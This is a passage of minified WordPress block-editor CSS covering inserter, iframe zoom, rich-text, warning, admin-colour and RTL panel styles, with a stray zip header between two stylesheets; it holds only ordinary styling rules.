.block-editor-default-block-appender__content:hover{ outline:1px solid #0000; } .block-editor-default-block-appender .block-editor-default-block-appender__content{ margin-block-end:0; margin-block-start:0; opacity:.62; } .block-editor-default-block-appender .components-drop-zone__content-icon{ display:none; } .block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon{ background:#1e1e1e; color:#fff; height:24px; min-width:24px; padding:0; } .block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-default-block-appender .block-editor-inserter{ line-height:0; position:absolute; right:0; top:0; } .block-editor-default-block-appender .block-editor-inserter:disabled{ display:none; } .block-editor-block-list__block .block-list-appender{ bottom:0; list-style:none; padding:0; position:absolute; right:0; z-index:2; } .block-editor-block-list__block .block-list-appender.block-list-appender{ line-height:0; margin:0; } .block-editor-block-list__block .block-list-appender .block-editor-inserter:disabled{ display:none; } .block-editor-block-list__block .block-list-appender .block-editor-default-block-appender{ height:24px; } .block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle{ background:#1e1e1e; box-shadow:none; color:#fff; display:none; flex-direction:row; height:24px; min-width:24px; padding:0 !important; width:24px; } .block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-block-list__block .block-list-appender .block-editor-default-block-appender__content{ display:none; } .block-editor-block-list__block .block-list-appender:only-child{ align-self:center; line-height:inherit; list-style:none; position:relative; right:auto; } .block-editor-block-list__block .block-list-appender:only-child .block-editor-default-block-appender__content{ display:block; } .block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle,.block-editor-block-list__block.is-selected>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected>.block-list-appender .block-list-appender__toggle{ display:flex; } .block-editor-default-block-appender__content{ cursor:text; } .block-editor-iframe__body{ position:relative; } .block-editor-iframe__html{ transform-origin:top center; } @media not (prefers-reduced-motion){ .block-editor-iframe__html{ transition:background-color .4s; } } .block-editor-iframe__html.zoom-out-animation{ bottom:0; left:0; overflow-y:var(--wp-block-editor-iframe-zoom-out-overflow-behavior, scroll); position:fixed; right:0; top:calc(var(--wp-block-editor-iframe-zoom-out-scroll-top, 0)*-1); } .block-editor-iframe__html.is-zoomed-out{ background-color:var(--wp-editor-canvas-background); margin-bottom:calc(var(--wp-block-editor-iframe-zoom-out-content-height)*(1 - var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1 + var(--wp-block-editor-iframe-zoom-out-frame-size, 0)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)*-1 + -2px); padding-bottom:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1)); padding-top:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1)); scale:var(--wp-block-editor-iframe-zoom-out-scale, 1); transform:translateX(calc((var(--wp-block-editor-iframe-zoom-out-scale-container-width) - var(--wp-block-editor-iframe-zoom-out-container-width, 100vw))/2/var(--wp-block-editor-iframe-zoom-out-scale, 1))); } .block-editor-iframe__html.is-zoomed-out body{ min-height:calc((var(--wp-block-editor-iframe-zoom-out-inner-height) - 2*var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1))/var(--wp-block-editor-iframe-zoom-out-scale, 1)); } .block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content){ display:flex; flex:1; flex-direction:column; height:100%; } .block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content)>main{ flex:1; } .block-editor-iframe__html.is-zoomed-out .wp-block[draggable]{ cursor:grab; } .block-editor-media-placeholder__cancel-button.is-link{ display:block; margin:1em; } .block-editor-media-placeholder.is-appender{ min-height:0; } .block-editor-media-placeholder.is-appender:hover{ box-shadow:0 0 0 1px var(--wp-admin-theme-color); cursor:pointer; } .block-editor-plain-text{ border:none; box-shadow:none; color:inherit; font-family:inherit; font-size:inherit; line-height:inherit; margin:0; padding:0; width:100%; } .rich-text [data-rich-text-placeholder]{ pointer-events:none; } .rich-text [data-rich-text-placeholder]:after{ content:attr(data-rich-text-placeholder); opacity:.62; } .rich-text:focus{ outline:none; } figcaption.block-editor-rich-text__editable [data-rich-text-placeholder]:before{ opacity:.8; } [data-rich-text-script]{ display:inline; } [data-rich-text-script]:before{ background:#ff0; content:""; } [data-rich-text-comment],[data-rich-text-format-boundary]{ border-radius:2px; } [data-rich-text-comment]{ background-color:currentColor; } [data-rich-text-comment] span{ color:currentColor; filter:invert(100%); padding:0 2px; } .rich-text [contenteditable=false]::selection{ background-color:initial; } .block-editor-warning{ align-items:center; background-color:#fff; border:1px solid #1e1e1e; border-radius:2px; display:flex; flex-wrap:wrap; padding:1em; } .block-editor-warning,.block-editor-warning .block-editor-warning__message{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; } .block-editor-warning .block-editor-warning__message{ color:#1e1e1e; font-size:13px; line-height:1.4; margin:0; } .block-editor-warning p.block-editor-warning__message.block-editor-warning__message{ min-height:auto; } .block-editor-warning .block-editor-warning__contents{ align-items:baseline; display:flex; flex-direction:row; flex-wrap:wrap; gap:12px; justify-content:space-between; width:100%; } .block-editor-warning .block-editor-warning__actions{ align-items:center; display:flex; gap:8px; } .components-popover.block-editor-warning__dropdown{ z-index:99998; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!٣#dist/block-editor/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-editor-autocompleters__block{white-space:nowrap}.block-editor-autocompleters__block .block-editor-block-icon{margin-left:8px}.block-editor-autocompleters__block[aria-selected=true] .block-editor-block-icon{color:inherit!important}.block-editor-autocompleters__link{white-space:nowrap}.block-editor-autocompleters__link .block-editor-block-icon{margin-left:8px}.block-editor-global-styles-background-panel__inspector-media-replace-container{border:1px solid #ddd;border-radius:2px;grid-column:1/-1;position:relative}.block-editor-global-styles-background-panel__inspector-media-replace-container.is-open{background-color:#f0f0f0}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item{border:0;flex-grow:1}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{display:block}.block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__inspector-preview-inner{height:100%}.block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown{display:block}.block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown .block-editor-global-styles-background-panel__dropdown-toggle{height:40px}.block-editor-global-styles-background-panel__image-tools-panel-item{border:1px solid #ddd;grid-column:1/-1;position:relative}.block-editor-global-styles-background-panel__image-tools-panel-item .components-drop-zone__content-icon{display:none}.block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{display:block}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button{color:#1e1e1e;display:block;width:100%}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:hover{color:var(--wp-admin-theme-color)}.block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading{height:100%;padding:10px 0 0;position:absolute;width:100%;z-index:1}.block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading svg{margin:0}.block-editor-global-styles-background-panel__dropdown-toggle{background:#0000;border:none;cursor:pointer;height:100%;padding-left:32px;padding-right:12px;width:100%}.block-editor-global-styles-background-panel__reset{left:0;margin:auto 8px;opacity:0;position:absolute;top:8px}@media not (prefers-reduced-motion){.block-editor-global-styles-background-panel__reset{transition:opacity .1s ease-in-out}}.block-editor-global-styles-background-panel__reset.block-editor-global-styles-background-panel__reset{border-radius:2px}.block-editor-global-styles-background-panel__dropdown-toggle:hover+.block-editor-global-styles-background-panel__reset,.block-editor-global-styles-background-panel__reset:focus,.block-editor-global-styles-background-panel__reset:hover{opacity:1}@media (hover:none){.block-editor-global-styles-background-panel__reset{opacity:1}}.block-editor-global-styles-background-panel__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-editor-global-styles-background-panel__inspector-preview-inner .block-editor-global-styles-background-panel__inspector-image-indicator-wrapper{height:20px;min-width:auto;width:20px}.block-editor-global-styles-background-panel__inspector-image-indicator{background-size:cover;border-radius:50%;display:block;height:20px;position:relative;width:20px}.block-editor-global-styles-background-panel__inspector-image-indicator:after{border:1px solid #0000;border-radius:50%;bottom:-1px;box-shadow:inset 0 0 0 1px #0003;box-sizing:inherit;content:"";left:-1px;position:absolute;right:-1px;top:-1px}.block-editor-global-styles-background-panel__dropdown-content-wrapper{min-width:260px;overflow-x:hidden}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker-wrapper{background-color:#f0f0f0;border:1px solid #ddd;border-radius:2px;width:100%}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker__media--image{max-height:180px}.block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker:after{content:none}.modal-open .block-editor-global-styles-background-panel__popover{z-index:159890}.block-editor-global-styles-background-panel__media-replace-popover .components-popover__content{width:226px}.block-editor-global-styles-background-panel__media-replace-popover .components-button{padding:0 8px}.block-editor-global-styles-background-panel__media-replace-popover .components-button .components-menu-items__item-icon.has-icon-right{margin-right:16px}.block-editor-block-alignment-control__menu-group .components-menu-item__info{margin-top:0}iframe[name=editor-canvas]{box-sizing:border-box;display:block;height:100%;width:100%}@media not (prefers-reduced-motion){iframe[name=editor-canvas]{transition:all .4s cubic-bezier(.46,.03,.52,.96)}}iframe[name=editor-canvas]{background-color:var(--wp-editor-canvas-background)}.block-editor-block-icon{align-items:center;display:flex;height:24px;justify-content:center;width:24px}.block-editor-block-icon.has-colors svg{fill:currentColor}@media (forced-colors:active){.block-editor-block-icon.has-colors svg{fill:CanvasText}}.block-editor-block-icon svg{max-height:24px;max-width:24px;min-height:20px;min-width:20px}.block-editor-block-inspector p:not(.components-base-control__help){margin-top:0}.block-editor-block-inspector h2,.block-editor-block-inspector h3{color:#1e1e1e;font-size:13px;margin-bottom:1.5em}.block-editor-block-inspector .block-editor-html-element-control:where(:not(:last-child)),.block-editor-block-inspector .block-editor-image-size-control:where(:not(:last-child)),.block-editor-block-inspector .components-base-control:where(:not(:last-child)),.block-editor-block-inspector .components-radio-control:where(:not(:last-child)){margin-bottom:16px}.block-editor-block-inspector .block-editor-html-element-control .components-base-control,.block-editor-block-inspector .block-editor-image-size-control .components-base-control,.block-editor-block-inspector .components-focal-point-picker-control .components-base-control,.block-editor-block-inspector .components-query-controls .components-base-control,.block-editor-block-inspector .components-range-control .components-base-control{margin-bottom:0}.block-editor-block-inspector .components-panel__body{border:none;border-top:1px solid #e0e0e0;margin-top:-1px}.block-editor-block-inspector__no-block-tools,.block-editor-block-inspector__no-blocks{background:#fff;display:block;font-size:13px;padding:32px 16px;text-align:center}.block-editor-block-inspector__no-block-tools{border-top:1px solid #ddd}.block-editor-block-inspector-edit-contents-button{justify-content:center;margin-top:8px}.block-editor-block-list__insertion-point{bottom:0;left:0;position:absolute;right:0;top:0}.block-editor-block-list__insertion-point-indicator{background:var(--wp-admin-theme-color);border-radius:2px;opacity:0;position:absolute;transform-origin:center;will-change:transform,opacity}.block-editor-block-list__insertion-point.is-vertical>.block-editor-block-list__insertion-point-indicator{height:4px;top:calc(50% - 2px);width:100%}.block-editor-block-list__insertion-point.is-horizontal>.block-editor-block-list__insertion-point-indicator{bottom:0;right:calc(50% - 2px);top:0;width:4px}.block-editor-block-list__insertion-point-inserter{display:none;position:absolute;will-change:transform}@media (min-width:480px){.block-editor-block-list__insertion-point-inserter{display:flex}}.block-editor-block-list__insertion-point-inserter{justify-content:center;right:calc(50% - 12px);top:calc(50% - 12px)}.block-editor-block-list__block-side-inserter-popover .components-popover__content>div{pointer-events:none}.block-editor-block-list__block-side-inserter-popover .components-popover__content>div>*{pointer-events:all}.block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter{left:0;line-height:0;position:absolute;top:0}.block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter:disabled{display:none}.block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{background:#1e1e1e;color:#fff;height:24px;min-width:24px;padding:0}.block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{background:var(--wp-admin-theme-color)}.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{background:#1e1e1e}@keyframes hide-during-dragging{to{position:fixed;transform:translate(-9999px,9999px)}}.components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar{border:1px solid #1e1e1e;border-radius:2px;margin-bottom:8px;margin-top:8px;overflow:visible;pointer-events:all;position:static;width:auto}.components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{margin-right:56px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{margin-right:0}.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar{overflow:visible}.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar,.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar-group{border-left-color:#1e1e1e}.components-popover.block-editor-block-list__block-popover.is-insertion-point-visible{visibility:hidden}.is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{opacity:0}@media not (prefers-reduced-motion){.is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{animation:hide-during-dragging 1ms linear forwards}}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{position:absolute;right:-57px}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector:before{content:""}.components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{background-color:#fff;border:1px solid #1e1e1e;padding-left:6px;padding-right:6px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{padding-left:12px;padding-right:12px}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{margin-right:-1px;position:relative;right:auto}.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-mover__move-button-container,.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar__block-controls .block-editor-block-mover{border-right:1px solid #1e1e1e}.is-dragging-components-draggable .components-tooltip{display:none}.components-popover.block-editor-block-popover__inbetween .block-editor-button-pattern-inserter__button{pointer-events:all;position:absolute;right:50%;top:50%;transform:translateX(50%) translateY(-50%)}.block-editor-block-tools--is-dragging>.popover-slot{display:none}.block-editor-block-lock-modal{z-index:1000001}.block-editor-block-lock-modal__options{border:0;margin:0;padding:0}.block-editor-block-lock-modal__options legend{margin-bottom:16px;padding:0}.block-editor-block-lock-modal__checklist{list-style:none;margin:0;padding:0}.block-editor-block-lock-modal__options-all{padding:12px 0}.block-editor-block-lock-modal__options-all .components-checkbox-control__label{font-weight:600}.block-editor-block-lock-modal__checklist-item{align-items:center;display:flex;gap:12px;justify-content:space-between;margin-bottom:0;padding:12px 32px 12px 0}.block-editor-block-lock-modal__checklist-item .block-editor-block-lock-modal__lock-icon{flex-shrink:0;margin-left:12px;fill:#1e1e1e}.block-editor-block-lock-modal__checklist-item:hover{background-color:#f0f0f0;border-radius:2px}.block-editor-block-lock-modal__template-lock{border-top:1px solid #ddd;margin-top:16px;padding-top:16px}.block-editor-block-lock-modal__actions{margin-top:24px}.block-editor-block-lock-toolbar .components-button.has-icon{min-width:36px!important}.block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{margin-right:-6px!important}.show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{border-right:1px solid #1e1e1e;margin-left:-6px;margin-right:6px!important}.block-editor-block-allowed-blocks-control:not(:only-child){margin-top:16px}.block-editor-block-allowed-blocks-control__button{justify-content:center;width:100%}.block-editor-block-allowed-blocks-modal{z-index:1000001}.block-editor-block-allowed-blocks-modal__actions{background-color:#fff;border-top:1px solid #ddd;bottom:-32px;margin:0 -32px -32px;padding:16px 32px;position:sticky;right:0;z-index:1}.block-editor-block-breadcrumb{list-style:none;margin:0;padding:0}.block-editor-block-breadcrumb li{display:inline-flex;margin:0}.block-editor-block-breadcrumb li .block-editor-block-breadcrumb__separator{fill:currentColor;margin-left:-4px;margin-right:-4px;transform:scaleX(-1)}.block-editor-block-breadcrumb li:last-child .block-editor-block-breadcrumb__separator{display:none}.block-editor-block-breadcrumb__current{cursor:default}.block-editor-block-breadcrumb__button.block-editor-block-breadcrumb__button,.block-editor-block-breadcrumb__current{color:#1e1e1e;font-size:inherit;padding:0 8px}.block-editor-block-card{align-items:flex-start;color:#1e1e1e;display:flex;padding:16px}.block-editor-block-card__title{align-items:center;display:flex;flex-wrap:wrap;font-weight:500;gap:4px 8px}.block-editor-block-card__title.block-editor-block-card__title{font-size:13px;line-height:1.4;margin:0}.block-editor-block-card__name{padding:3px 0}.block-editor-block-card .block-editor-block-icon{flex:0 0 24px;height:24px;margin-left:12px;margin-right:0;width:24px}.block-editor-block-card.is-synced .block-editor-block-icon{color:var(--wp-block-synced-color)}.block-editor-block-compare{height:auto}.block-editor-block-compare__wrapper{display:flex;padding-bottom:16px}.block-editor-block-compare__wrapper>div{display:flex;flex-direction:column;justify-content:space-between;max-width:600px;min-width:200px;padding:0 0 0 16px;width:50%}.block-editor-block-compare__wrapper>div button{float:left}.block-editor-block-compare__wrapper .block-editor-block-compare__converted{border-right:1px solid #ddd;padding-left:0;padding-right:15px}.block-editor-block-compare__wrapper .block-editor-block-compare__html{border-bottom:1px solid #ddd;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:12px;line-height:1.7;padding-bottom:15px}.block-editor-block-compare__wrapper .block-editor-block-compare__html span{background-color:#e6ffed;padding-bottom:3px;padding-top:3px}.block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__added{background-color:#acf2bd}.block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__removed{background-color:#cc1818}.block-editor-block-compare__wrapper .block-editor-block-compare__preview{padding:16px 0 0}.block-editor-block-compare__wrapper .block-editor-block-compare__preview p{font-size:12px;margin-top:0}.block-editor-block-compare__wrapper .block-editor-block-compare__action{margin-top:16px}.block-editor-block-compare__wrapper .block-editor-block-compare__heading{font-size:1em;font-weight:400;margin:.67em 0}.block-editor-block-draggable-chip-wrapper{position:absolute;right:0;top:-24px}.block-editor-block-draggable-chip{background-color:#1e1e1e;border-radius:2px;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;color:#fff;cursor:grabbing;display:inline-flex;height:48px;padding:0 13px;position:relative;-webkit-user-select:none;user-select:none;width:max-content}.block-editor-block-draggable-chip svg{fill:currentColor}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content{justify-content:flex-start;margin:auto}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item{margin-left:6px}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item:last-child{margin-left:0}.block-editor-block-draggable-chip .block-editor-block-draggable-chip__content .block-editor-block-icon svg{min-height:18px;min-width:18px}.block-editor-block-draggable-chip .components-flex__item{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{align-items:center;background-color:initial;bottom:0;display:flex;justify-content:center;left:0;opacity:0;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{transition:all .1s linear .1s}}.block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled .block-editor-block-draggable-chip__disabled-icon{background:#0000 linear-gradient(45deg,#0000 47.5%,#fff 0,#fff 52.5%,#0000 0);border-radius:50%;box-shadow:inset 0 0 0 1.5px #fff;display:inline-block;height:20px;padding:0;width:20px}.block-draggable-invalid-drag-token .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{background-color:#757575;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;opacity:1}.block-editor-block-manager__no-results{font-style:italic;padding:24px 0;text-align:center}.block-editor-block-manager__category{margin:0 0 24px}.block-editor-block-manager__category-title{background-color:#fff;padding:16px 0;position:sticky;top:-4px;z-index:1}.block-editor-block-manager__category-title .components-checkbox-control__label{font-weight:600}.block-editor-block-manager__checklist{margin-top:0}.block-editor-block-manager__category-title,.block-editor-block-manager__checklist-item{border-bottom:1px solid #ddd}.block-editor-block-manager__checklist-item{align-items:center;display:flex;justify-content:space-between;margin-bottom:0;padding:8px 16px 8px 0}.components-modal__content .block-editor-block-manager__checklist-item.components-checkbox-control__input-container{margin:0 8px}.block-editor-block-manager__checklist-item .block-editor-block-icon{margin-left:10px;fill:#1e1e1e}.block-editor-block-manager__results{border-top:1px solid #ddd}.block-editor-block-manager__disabled-blocks-count+.block-editor-block-manager__results{border-top-width:0}.block-editor-block-mover__move-button-container{border:none;display:flex;justify-content:center;padding:0}@media (min-width:600px){.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{flex-direction:column}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>*{height:20px;min-width:0!important;width:100%}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>:before{height:calc(100% - 4px)}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{flex-shrink:0;top:3px}.block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{bottom:3px;flex-shrink:0}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{width:48px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container>*{min-width:0!important;overflow:hidden;width:24px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button{padding-left:0;padding-right:0}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{right:5px}.block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{left:5px}}.block-editor-block-mover__drag-handle{cursor:grab}@media (min-width:600px){.block-editor-block-mover__drag-handle{min-width:0!important;overflow:hidden;width:24px}.block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon.has-icon{padding-left:0;padding-right:0}}.components-button.block-editor-block-mover-button{overflow:hidden}.components-button.block-editor-block-mover-button:before{border-radius:2px;content:"";display:block;height:32px;left:8px;position:absolute;right:8px;z-index:-1}@media not (prefers-reduced-motion){.components-button.block-editor-block-mover-button:before{animation:components-button__appear-animation .1s ease;animation-fill-mode:forwards}}.components-button.block-editor-block-mover-button:focus,.components-button.block-editor-block-mover-button:focus:before,.components-button.block-editor-block-mover-button:focus:enabled{box-shadow:none;outline:none}.components-button.block-editor-block-mover-button:focus-visible:before{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-block-navigation__container{min-width:280px}.block-editor-block-navigation__label{color:#757575;font-size:11px;font-weight:500;margin:0 0 12px;text-transform:uppercase}.block-editor-block-patterns-list__list-item{cursor:pointer;margin-bottom:16px;position:relative}.block-editor-block-patterns-list__list-item.is-placeholder{min-height:100px}.block-editor-block-patterns-list__list-item[draggable=true]{cursor:grab}.block-editor-block-patterns-list__item{height:100%;outline:0;scroll-margin-bottom:56px;scroll-margin-top:24px}.block-editor-block-patterns-list__item .block-editor-block-patterns-list__item-title{flex-grow:1;font-size:12px;text-align:right}.block-editor-block-patterns-list__item .block-editor-block-preview__container{align-items:center;border-radius:4px;display:flex;overflow:hidden}.block-editor-block-patterns-list__item .block-editor-block-preview__container:after{border-radius:4px;outline:1px solid #0000001a;outline-offset:-1px}@media not (prefers-reduced-motion){.block-editor-block-patterns-list__item .block-editor-block-preview__container:after{transition:outline .1s linear}}.block-editor-block-patterns-list__item.is-selected 